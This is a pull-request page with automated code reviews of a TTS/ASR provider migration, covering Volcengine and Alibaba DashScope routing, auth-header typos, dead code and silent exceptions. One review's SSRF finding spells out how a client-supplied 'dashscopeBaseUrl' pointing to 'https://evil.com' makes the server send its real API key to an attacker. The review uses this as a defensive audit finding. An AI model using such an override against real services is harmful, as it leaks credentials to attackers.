backend/tests/test_provider_catalog_tts_defaults.py


46. backend/app/api/providers.py ✨ Enhancement +52/-23

Refactor provider field serialization with Alibaba-specific filtering

• Added ALIYUN_NLS_PROVIDER_ID constant for Alibaba NLS provider identification
• Extracted field serialization logic into _provider_field_to_dict() helper function
• Created _aliyun_nls_default_field_dicts() to return minimal field configuration (API key only)
 for Alibaba provider
• Introduced _resolve_provider_field_dicts() to conditionally filter provider fields, hiding
 OpenAI-style fields for Alibaba NLS

backend/app/api/providers.py


47. backend/tests/test_provider_catalog_aliyun_fields.py 🧪 Tests +76/-0

Add Alibaba provider field normalization tests

• New test file validating Alibaba NLS provider field normalization
• Tests that only apiKey field is exposed when OpenAI-style fields are present
• Verifies minimal field shape enforcement for Alibaba provider configuration

backend/tests/test_provider_catalog_aliyun_fields.py


48. backend/tests/test_asr_stream_disconnect.py 🧪 Tests +45/-0

Add ASR stream disconnect detection tests

• New test file for WebSocket disconnect detection in ASR streaming
• Tests _is_websocket_disconnect_message() for disconnect frame detection
• Tests _is_disconnect_receive_runtime_error() for runtime error message matching
• Validates that unrelated runtime errors are properly ignored

backend/tests/test_asr_stream_disconnect.py
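
The two kinds of disconnect check mentioned above can be sketched as small predicates. The function names below are simplified stand-ins for the helpers named in the list, and the matched error text is an assumption about the wording an ASGI framework uses when `receive` is called after a disconnect.

```python
def is_disconnect_message(message: dict) -> bool:
    """True for an ASGI websocket.disconnect event."""
    return message.get("type") == "websocket.disconnect"


def is_disconnect_runtime_error(exc: RuntimeError) -> bool:
    """True when a RuntimeError only reports an already-closed socket."""
    text = str(exc).lower()
    # Assumed wording; unrelated runtime errors must not match.
    return "disconnect message has been received" in text
```

Treating these cases as a normal end of stream lets the handler run its cleanup instead of logging a spurious failure.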


49. backend/app/services/providers/voices/alibaba.json ⚙️ Configuration changes +294/-0

Add Alibaba Bailian TTS voice catalog

• New static voice catalog for Alibaba Bailian TTS provider
• Contains 20 voice profiles with metadata (name, preview URL, model, voice ID, scenarios, language,
 bitrate, format)
• Supports cosyvoice-v1 model with Chinese and bilingual voice options

backend/app/services/providers/voices/alibaba.json


50. backend/config/providers.yaml ⚙️ Configuration changes +11/-18

Migrate TTS/ASR providers to official endpoints with field normalization

• Updated Volcengine TTS provider: changed base_url from https://unspeech.hyp3r.link/v1/ to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS provider: changed base_url to https://dashscope.aliyuncs.com and
 normalized model ID from alibaba/cosyvoice-v1 to cosyvoice-v1
• Updated Alibaba ASR provider: added engine_id: aliyun-nls-asr, removed baseUrl and model
 fields, kept only apiKey field
• Changed Alibaba ASR voice field type from select with options_source: voices to plain text
 type

backend/config/providers.yaml


51. backend/config/engines.yaml ⚙️ Configuration changes +27/-3

Add Alibaba Bailian ASR engine and update TTS endpoints

• Updated Volcengine TTS engine: changed base_url from https://unspeech.hyp3r.link/v1 to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS engine: changed base_url to https://dashscope.aliyuncs.com and model from
 alibaba/cosyvoice-v1 to cosyvoice-v1
• Added new aliyun-nls-asr engine with type aliyun_dashscope_asr, pointing to
 https://dashscope.aliyuncs.com
• Configured ASR defaults and parameters for Alibaba provider (VAD, ITN, region settings)

backend/config/engines.yaml


52. frontend/apps/desktop-tauri/src-tauri/tauri.conf.json ⚙️ Configuration changes +2/-0

Enable HTTPS scheme for Tauri desktop windows

• Added "useHttpsScheme": true to main window configuration
• Added "useHttpsScheme": true to settings window configuration

frontend/apps/desktop-tauri/src-tauri/tauri.conf.json


53. backend/pyproject.toml Dependencies +1/-1

Promote websockets to core dependency

• Moved websockets>=12.0 from optional dev dependencies to core dependencies
• Makes WebSocket support a required dependency for all installations

backend/pyproject.toml


54. .idea/whale-whisper.iml ⚙️ Configuration changes +8/-0

Add IDE module configuration

• New PyCharm/IntelliJ IDE module configuration file
• Defines Python module structure with inherited JDK and source folder settings

.idea/whale-whisper.iml


55. .idea/modules.xml ⚙️ Configuration changes +8/-0

Add IDE project module registry

• New IDE project module manager configuration
• Registers whale-whisper.iml module for the project

.idea/modules.xml


56. .idea/vcs.xml ⚙️ Configuration changes +7/-0

Add IDE Git version control mapping

• New IDE version control configuration
• Maps project root and airi submodule to Git version control

.idea/vcs.xml


57. .idea/misc.xml ⚙️ Configuration changes +4/-0

Add IDE project JDK configuration

• New IDE project settings configuration
• Specifies whale-whisper Python SDK as project JDK

.idea/misc.xml


58. .idea/inspectionProfiles/profiles_settings.xml ⚙️ Configuration changes +6/-0

Add IDE inspection profile settings

• New IDE inspection profiles settings
• Disables project-specific inspection profile in favor of default settings

.idea/inspectionProfiles/profiles_settings.xml


59. .idea/easycode.ignore ⚙️ Configuration changes +13/-0

Add EasyCode plugin ignore patterns

• New ignore patterns file for EasyCode IDE plugin
• Excludes common build artifacts, node modules, test files, and minified assets

.idea/easycode.ignore


60. CLAUDE.md 📝 Documentation +296/-0

Add comprehensive Claude Code development guide

• New comprehensive development guide for Claude Code integration
• Documents project overview, architecture, code standards, testing procedures, and common commands
• Includes environment setup instructions, project structure, and contribution guidelines
• Provides troubleshooting tips and resource references

CLAUDE.md


61. .idea/inspectionProfiles/Project_Default.xml Additional files +144/-0

...

.idea/inspectionProfiles/Project_Default.xml


62. backend/app/services/providers/voices/volcengine.json Additional files +3176/-0

...

backend/app/services/providers/voices/volcengine.json


63. frontend/apps/desktop-tauri/renderer/src/App.vue Additional files +0/-7

...

frontend/apps/desktop-tauri/renderer/src/App.vue



@qodo-code-review

qodo-code-review bot commented Mar 1, 2026

Code Review by Qodo

🐞 Bugs (3) 📘 Rule violations (0) 📎 Requirement gaps (0)


Action required

1. Dify/Coze TTS broken 🐞 Bug ✓ Correctness
Description
run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and
instead falls through to _build_unspeech_payload, which requires model and voice. Since
dify-tts/coze-tts are still configured without a model, these engines will now error (400) or
send incompatible payloads to their provider endpoints.
Code

backend/app/api/tts.py[R76-115]

@router.post("/engines")
-async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse:
-    engine_id = _resolve_engine_id(request.engine)
-    config = _get_engine_config(engine_id)
-    text = _coerce_text(request.data)
+async def run_tts_engine(request: EngineRunRequest) -> Response:
+    engine_id = _resolve_tts_engine_id(request.engine)
+    runtime_config = _get_tts_engine_config(engine_id)
+
+    text = _extract_tts_input(request.data)
   if not text:
       raise HTTPException(status_code=400, detail="Missing text input")

-    engine_type = (config.engine_type or "openai_compat").lower()
   overrides = request.config if isinstance(request.config, dict) else {}
+    api_key = _resolve_tts_api_key(runtime_config, overrides)
+    if not api_key:
+        raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider")
+
+    if engine_id in VOLCENGINE_ENGINE_IDS:
+        return await _forward_volcengine_tts(
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"dify_tts", "dify"}:
-        stream = await _stream_dify_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    if engine_id in ALIBABA_ENGINE_IDS:
+        return await _forward_alibaba_tts(
+            engine_id=engine_id,
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"coze_tts", "coze"}:
-        stream = await _stream_coze_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    payload = _build_unspeech_payload(
+        engine_id=engine_id,
+        runtime_config=runtime_config,
+        text=text,
+        overrides=overrides,
+    )

-    base_url_override, api_key_override = _resolve_connection_overrides(overrides)
-    payload: Dict[str, Any] = {"model": config.model, "input": text}
-    payload.update(config.default_params)
-    payload.update(sanitize_config(overrides))
+    speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None
+    url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech")
Evidence
The TTS execution path now only special-cases Volcengine/Alibaba; everything else is forced through
_build_unspeech_payload, which hard-requires model and voice. But dify-tts and coze-tts
engine configs do not define a model, so they cannot satisfy the new required payload fields.

backend/app/api/tts.py[76-115]
backend/app/api/tts.py[376-389]
backend/config/engines.yaml[138-179]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don't have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with "Missing model" or send incompatible JSON to `/text-to-audio` / Coze endpoints.
## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.
## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]
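
One way to keep the Dify/Coze engines working is to dispatch on the engine type before falling back to the OpenAI-compatible payload builder. The sketch below is a minimal illustration only: `EngineConfig`, `handle_dify`, `handle_coze`, `handle_openai_compat`, and `dispatch_tts` are hypothetical names, not the PR's actual functions, and the handlers return strings in place of real audio responses.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class EngineConfig:
    """Simplified stand-in for the backend's engine config (hypothetical)."""
    engine_id: str
    engine_type: Optional[str] = None
    model: Optional[str] = None


def handle_dify(config: EngineConfig, text: str) -> str:
    # Placeholder for a dedicated Dify TTS call; no model/voice required.
    return f"dify:{text}"


def handle_coze(config: EngineConfig, text: str) -> str:
    # Placeholder for a dedicated Coze TTS call; no model/voice required.
    return f"coze:{text}"


def handle_openai_compat(config: EngineConfig, text: str) -> str:
    # Only the OpenAI-compatible path insists on a model.
    if not config.model:
        raise ValueError("Missing model")
    return f"openai:{config.model}:{text}"


# Engine-type aliases mapped to their dedicated handlers.
HANDLERS: Dict[str, Callable[[EngineConfig, str], str]] = {
    "dify_tts": handle_dify,
    "dify": handle_dify,
    "coze_tts": handle_coze,
    "coze": handle_coze,
}


def dispatch_tts(config: EngineConfig, text: str) -> str:
    """Route by engine type first; fall back to the OpenAI-compatible path."""
    engine_type = (config.engine_type or "openai_compat").lower()
    handler = HANDLERS.get(engine_type, handle_openai_compat)
    return handler(config, text)
```

With this shape, an engine configured without a `model` only fails when it really is routed to the OpenAI-compatible handler.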



2. Volcengine auth header typo 🐞 Bug ✓ Correctness
Description
The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard
Bearer format used elsewhere in the backend. This is very likely to cause authentication failures
for all Volcengine TTS requests.
Code

backend/app/api/tts.py[R583-587]

+    headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer;{api_key}",
+    }
+    headers.update(runtime_config.headers)
Evidence
The Volcengine forwarder uses a different Authorization header format than both the generic TTS
relay and the ASR codepaths. This inconsistency strongly indicates a typo/regression in the new
Volcengine routing logic.

backend/app/api/tts.py[583-587]
backend/app/api/tts.py[117-120]
backend/app/api/asr.py[337-342]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.
## Issue Context
This occurs only in the new direct Volcengine routing path.
## Fix Focus Areas
- backend/app/api/tts.py[574-616]
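
Because the header format differs between code paths, one option is to build it in a single helper and pin the expected string in a test. The sketch below assumes a hypothetical `build_auth_header` helper. The separator each provider actually expects (a space, as in the standard Bearer scheme, or something provider-specific) should be checked against that provider's API documentation before the value is changed.

```python
from typing import Dict


def build_auth_header(api_key: str, scheme: str = "Bearer", separator: str = " ") -> Dict[str, str]:
    """Build an Authorization header; the separator is explicit so it cannot drift silently."""
    token = api_key.strip()
    if not token:
        raise ValueError("api_key must not be empty")
    return {"Authorization": f"{scheme}{separator}{token}"}
```

A unit test per provider that asserts the exact header string makes any later change to the format a deliberate one.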




Remediation recommended

3. Volcengine health mismatch 🐞 Bug ⛯ Reliability
Description
volcengine-speech now uses the official provider base_url but still configures a /models
health path, while health checks always call base_url + health_path. This health check is no
longer aligned with the engine’s actual direct-routing behavior and may produce misleading unhealthy
results.
Code

backend/config/engines.yaml[R106-112]

   - id: volcengine-speech
     label: Volcengine
     type: openai_compat
-      base_url: https://unspeech.hyp3r.link/v1
+      base_url: https://openspeech.bytedance.com/api/v1/tts
     model: v1
     api_key_env: UNSPEECH_API_KEY
     paths:
Evidence
The health-check mechanism concatenates base_url with a (default) OpenAI-style path (/models).
After switching Volcengine to an official TTS endpoint base URL, this health strategy is no longer
obviously appropriate, especially since runtime requests bypass OpenAI-compatible semantics entirely
via the _forward_volcengine_tts path.

backend/config/engines.yaml[106-115]
backend/app/services/engines/health.py[24-27]
backend/app/api/tts.py[90-96]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
After switching Volcengine to a direct provider base URL, the engine health check still calls `base_url + /models` (OpenAI-compat style). This may not reflect real Volcengine availability and can create false negatives.
## Issue Context
Health checks are used by `/tts/engines/{engine}/health` and rely on `paths.health`.
## Fix Focus Areas
- backend/config/engines.yaml[106-115]
- backend/app/services/engines/health.py[10-44]
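
A possible direction is to skip the probe when an engine declares no health path, instead of defaulting to an OpenAI-style `/models`. The following is a minimal sketch under that assumption; `resolve_health_url` is a hypothetical helper and does not reflect the current contents of `health.py`.

```python
from typing import Mapping, Optional


def resolve_health_url(base_url: str, paths: Optional[Mapping[str, str]]) -> Optional[str]:
    """Return the URL to probe, or None when the engine declares no health path."""
    health_path = (paths or {}).get("health")
    if not health_path:
        # No OpenAI-style default: a missing path means "skip the probe".
        return None
    return base_url.rstrip("/") + "/" + health_path.lstrip("/")
```

Under this scheme the Volcengine entry would drop `paths.health` from its config, and the caller would report the engine as "not checked" rather than unhealthy.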




@github-actions

github-actions bot commented Mar 1, 2026

Blocker (can’t start the diff-scoped review)

  • gh pr view / gh pr diff fail with: error connecting to api.github.com (no outbound network/DNS in this sandbox). curl https://github.com also fails (Could not resolve host), so I can’t fetch the metadata/diff for PR #36 (feat: migrate TTS providers to backend direct routing) or post review comments/labels.

What I can confirm from the local GitHub Actions event payload

  • PR #36 (base dev, head fix/tts-voice-flow) has 8862 additions, 992 deletions, 66 files changed → Size = XL (recommended label: size/XL).

Unblock options (pick one)

  • Enable DNS + HTTPS egress to api.github.com (and rerun), so I can execute the required gh pr diff/view/edit/review workflow.
  • Or paste the outputs of:
    • gh pr diff 36 --repo datawhalechina/whale-whisper --color=never
    • gh pr view 36 --repo datawhalechina/whale-whisper --json headRefOid,additions,deletions,changedFiles,files --jq '.headRefOid, .additions, .deletions, .changedFiles, (.files[].path)'

With that diff, I’ll produce diff-line-only inline comment commands (with exact path + line + concrete code fixes) and the final gh pr review summary body, plus XL split suggestions grounded in the actual changes.


@github-actions github-actions bot left a comment


Code Review Summary

This PR migrates TTS/ASR providers from relying on the unspeech proxy to direct backend routing to Volcengine and Alibaba Cloud endpoints. The implementation is substantial (66 files, 8730+/992-) with solid test coverage for the new backend relay paths and frontend request builders. Two issues warrant attention before merge.

PR Size: XL

Issues Found

| Category | Critical | High | Medium | Low |
|---|---|---|---|---|
| Security | 1 | 0 | 0 | 0 |
| Error Handling | 0 | 1 | 0 | 0 |
| Hygiene | 0 | 0 | 1 | 0 |

Detail

  1. [SECURITY-VULNERABILITY] SSRF via user-controlled provider URLs: _resolve_volcengine_tts_url and _resolve_alibaba_tts_ws_url accept arbitrary URLs from the client-supplied config dict. A caller can redirect the backend to internal services; if server-side API keys are configured via env vars, those credentials leak to the attacker-controlled endpoint. See inline comment on tts.py:459.

  2. [ERROR-SILENT] Voice catalog load errors silently cached: _load_local_tts_voices_cached catches Exception and returns []. Combined with @lru_cache, a transient read/parse failure is permanently cached as empty until process restart, with zero logging. See inline comment on registry.py:204.

  3. [HYGIENE] .idea/ directory committed — 8 IDE-specific files (inspection profiles, module config, VCS mappings) are tracked. These should be added to .gitignore alongside .vscode/.
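
For item 2, one option is to let failures propagate out of the cached function, since `functools.lru_cache` stores return values but not raised exceptions, and to log and fall back at the call site. The sketch below is an illustration under that assumption; `_load_voices_cached` and `load_voices` are hypothetical names, not the functions in `registry.py`.

```python
import json
import logging
from functools import lru_cache
from pathlib import Path
from typing import Any, Dict, List, Tuple

logger = logging.getLogger(__name__)


@lru_cache(maxsize=32)
def _load_voices_cached(path: str) -> Tuple[Dict[str, Any], ...]:
    """Parse the catalog; exceptions propagate, and lru_cache does not store them."""
    data = json.loads(Path(path).read_text(encoding="utf-8"))
    if not isinstance(data, list):
        raise ValueError(f"Voice catalog {path} must be a JSON array")
    return tuple(data)


def load_voices(path: str) -> List[Dict[str, Any]]:
    """Return the voices, or [] after logging; a later call retries the read."""
    try:
        return list(_load_voices_cached(path))
    except (OSError, ValueError):
        # json.JSONDecodeError is a ValueError subclass, so parse errors land here too.
        logger.warning("Failed to load voice catalog %s", path, exc_info=True)
        return []
```

Only successful loads end up in the cache, so a transient read error no longer persists until process restart.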

Review Coverage

  • Logic and correctness
  • Security (OWASP Top 10)
  • Error handling
  • Type safety
  • Documentation accuracy
  • Test coverage
  • Code clarity

Automated review by Claude AI

def _resolve_aliyun_dashscope_base_url(params: Dict[str, Any], config) -> str:
    explicit_base = str(
        _first_present(params, "base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl")

[SECURITY-VULNERABILITY] SSRF + credential leakage via unblocked dashscope_base_url / dashscopeBaseUrl override keys.

ASR_BLOCKED_CONFIG_KEYS blocks base_url and baseUrl, but _resolve_aliyun_dashscope_base_url also reads dashscope_base_url and dashscopeBaseUrl from the merged params. These keys are not in the block list, so a client can inject an arbitrary destination URL through the config override dict.

Attack scenario:

  1. Client sends {"config": {"dashscopeBaseUrl": "https://evil.com"}} via the ASR endpoint
  2. No dashscopeApiKey provided → server falls back to resolve_api_key(config.api_key_env) (reads DASHSCOPE_API_KEY env var)
  3. Server POSTs to https://evil.com/compatible-mode/v1/chat/completions with Authorization: Bearer <real_api_key>
  4. Attacker captures the DashScope API key

Suggested fix — add the extra keys to the block set:

ASR_BLOCKED_CONFIG_KEYS = frozenset(
    {
        "api_key", "apiKey",
        "base_url", "baseUrl",
        "dashscope_base_url", "dashscopeBaseUrl",
        "dashscope_api_key", "dashscopeApiKey",
        "engine", "filename", "file_name",
        "file", "content_type", "mime_type",
    }
)

Alternatively, _resolve_aliyun_dashscope_base_url should only read from config.base_url (server-side YAML config) and never from client-provided overrides.
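
The two mitigations can be combined: strip the sensitive keys from client overrides, and validate any resolved URL against a host allowlist before credentials are attached. The sketch below is a minimal illustration; `BLOCKED_KEYS` lists only a subset of the keys suggested above, and `ALLOWED_HOSTS`, `sanitize_overrides`, and `validate_base_url` are hypothetical names rather than existing backend code.

```python
from typing import Any, Dict
from urllib.parse import urlsplit

# Keys a client must never be able to set (subset of the suggested block list).
BLOCKED_KEYS = frozenset({
    "api_key", "apiKey", "base_url", "baseUrl",
    "dashscope_base_url", "dashscopeBaseUrl",
})

# Hypothetical allowlist of hosts the backend may send credentials to.
ALLOWED_HOSTS = frozenset({"dashscope.aliyuncs.com"})


def sanitize_overrides(overrides: Dict[str, Any]) -> Dict[str, Any]:
    """Drop blocked keys from client-supplied config overrides."""
    return {k: v for k, v in overrides.items() if k not in BLOCKED_KEYS}


def validate_base_url(url: str) -> str:
    """Accept only https/wss URLs whose host is on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme not in {"https", "wss"}:
        raise ValueError(f"Unsupported scheme: {parts.scheme!r}")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"Host not allowed: {parts.hostname!r}")
    return url
```

Checking `hostname` rather than doing a substring match also rejects URLs such as `https://dashscope.aliyuncs.com@evil.com`, where the real host is `evil.com`.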

async with ws_connect(
    ws_url,
    additional_headers={
        "Authorization": api_key,

[LOGIC-BUG] Missing Bearer prefix in Alibaba TTS WebSocket Authorization header.

The DashScope WebSocket streaming synthesis API (/api-ws/v1/inference) expects Authorization: bearer <api_key>. This code sends the raw API key without the prefix, which will cause authentication to fail at runtime.

Compare with the ASR realtime code which correctly uses the prefix:

# asr.py:753 — correct
"Authorization": f"Bearer {resolved['api_key']}",

Suggested fix:

additional_headers={
    "Authorization": f"Bearer {api_key}",
    "X-DashScope-DataInspection": "enable",
},


model = ALIYUN_ASR_REALTIME_MODEL
if not model:
    raise HTTPException(status_code=400, detail="Alibaba Bailian ASR missing model")

[LOGIC-BUG] Dead code — unreachable model validation.

ALIYUN_ASR_REALTIME_MODEL is a non-empty constant ("qwen3-asr-flash-realtime"), so if not model: on line 516 can never be True. This check is dead code and may mask a real intent (e.g., the model should perhaps come from config or overrides rather than be hardcoded).

Suggested fix — remove the dead branch:

def _resolve_aliyun_dashscope_credentials(config, overrides):
    ...
    model = ALIYUN_ASR_REALTIME_MODEL
    return {
        "params": params,
        "api_key": api_key,
        "model": model,
        "base_url": _resolve_aliyun_dashscope_base_url(params, config),
    }
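
If the intent was instead for the model to be configurable, the lookup could prefer an override or server-side value and fall back to the constant. This is a sketch under that assumption only: `resolve_realtime_model` and the `model` override key are hypothetical, and the PR as written hardcodes the constant.

```python
from typing import Any, Mapping, Optional

ALIYUN_ASR_REALTIME_MODEL = "qwen3-asr-flash-realtime"


def resolve_realtime_model(overrides: Mapping[str, Any], configured: Optional[str] = None) -> str:
    """Pick the model from overrides, then server config, then the constant."""
    for candidate in (overrides.get("model"), configured):
        if isinstance(candidate, str) and candidate.strip():
            return candidate.strip()
    # The constant is non-empty, so no "missing model" branch is needed.
    return ALIYUN_ASR_REALTIME_MODEL
```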

try:
    await session.ws.close()
except Exception:
    pass

[ERROR-SILENT] _close_aliyun_realtime_session swallows all exceptions without logging.

Two bare except Exception: pass blocks discard errors silently. While cleanup code often ignores errors, the project constitution requires logging — unexpected failures during teardown (e.g., hung reader task, broken pipe) become invisible when debugging production issues.

Suggested fix — add logger.debug so the errors are at least traceable:

async def _close_aliyun_realtime_session(session: AliyunRealtimeSession) -> None:
    if session.reader_task is not None:
        session.reader_task.cancel()
        try:
            await session.reader_task
        except asyncio.CancelledError:
            pass
        except Exception:
            logger.debug("Error awaiting Aliyun reader task during cleanup", exc_info=True)
    try:
        await session.ws.close()
    except Exception:
        logger.debug("Error closing Aliyun WebSocket during cleanup", exc_info=True)


@github-actions github-actions bot left a comment


Code Review Summary

This is a large, ambitious PR that migrates TTS/ASR from third-party relay services to direct API integration with Volcengine and Alibaba DashScope, adds real-time streaming ASR, incremental TTS during LLM streaming, and microphone UI controls. The code is generally well-structured with good error handling patterns and comprehensive test coverage for utility functions. However, there is a critical SSRF vulnerability that must be fixed before merge.

PR Size: XL

(8862 additions, 992 deletions, 66 files)

Issues Found

| Category | Critical | High | Medium | Low |
|---|---|---|---|---|
| Security | 1 | | | |
| Logic | | 1 | 1 | |
| Error Handling | | | 1 | |

Critical

  1. [SECURITY-VULNERABILITY] backend/app/api/asr.py:492 — SSRF + credential leakage via unblocked dashscope_base_url/dashscopeBaseUrl override keys. Client-provided config overrides can redirect server-side HTTP/WebSocket requests to arbitrary URLs, leaking the server's DashScope API key. The ASR_BLOCKED_CONFIG_KEYS block list must be extended to cover these alias keys.

High

  1. [LOGIC-BUG] backend/app/api/tts.py:709 — Missing Bearer prefix in Alibaba TTS WebSocket Authorization header. The DashScope streaming synthesis API expects Authorization: bearer <key>, but the code sends the raw key. The ASR code at asr.py:753 correctly uses f"Bearer {api_key}". This will cause Alibaba CosyVoice TTS to fail with an auth error in production.

Medium

  1. [LOGIC-BUG] backend/app/api/asr.py:515-517 — Dead code: model = ALIYUN_ASR_REALTIME_MODEL followed by if not model: is unreachable since the constant is a non-empty string. May mask intent to make the model configurable.

  2. [ERROR-SILENT] backend/app/api/asr.py:832-838: _close_aliyun_realtime_session has two except Exception: pass blocks that silently discard errors during cleanup. Should at least use logger.debug for production traceability.

Additional Note

The .idea/ directory (JetBrains IDE config) is included in the diff. As noted in the PR checklist, this should be removed from the commit and added to .gitignore.

Review Coverage

  • Logic and correctness
  • Security (OWASP Top 10)
  • Error handling
  • Type safety
  • Documentation accuracy
  • Test coverage
  • Code clarity

Automated review by Claude AI

Labels

  • area/backend: Touches backend (FastAPI/Python)
  • area/frontend: Touches frontend (Vue/TS)
  • needs-review: Needs careful review (large/complex changes)
  • size/XL: PR size: >= 1000 lines changed
  • type/feature: New feature
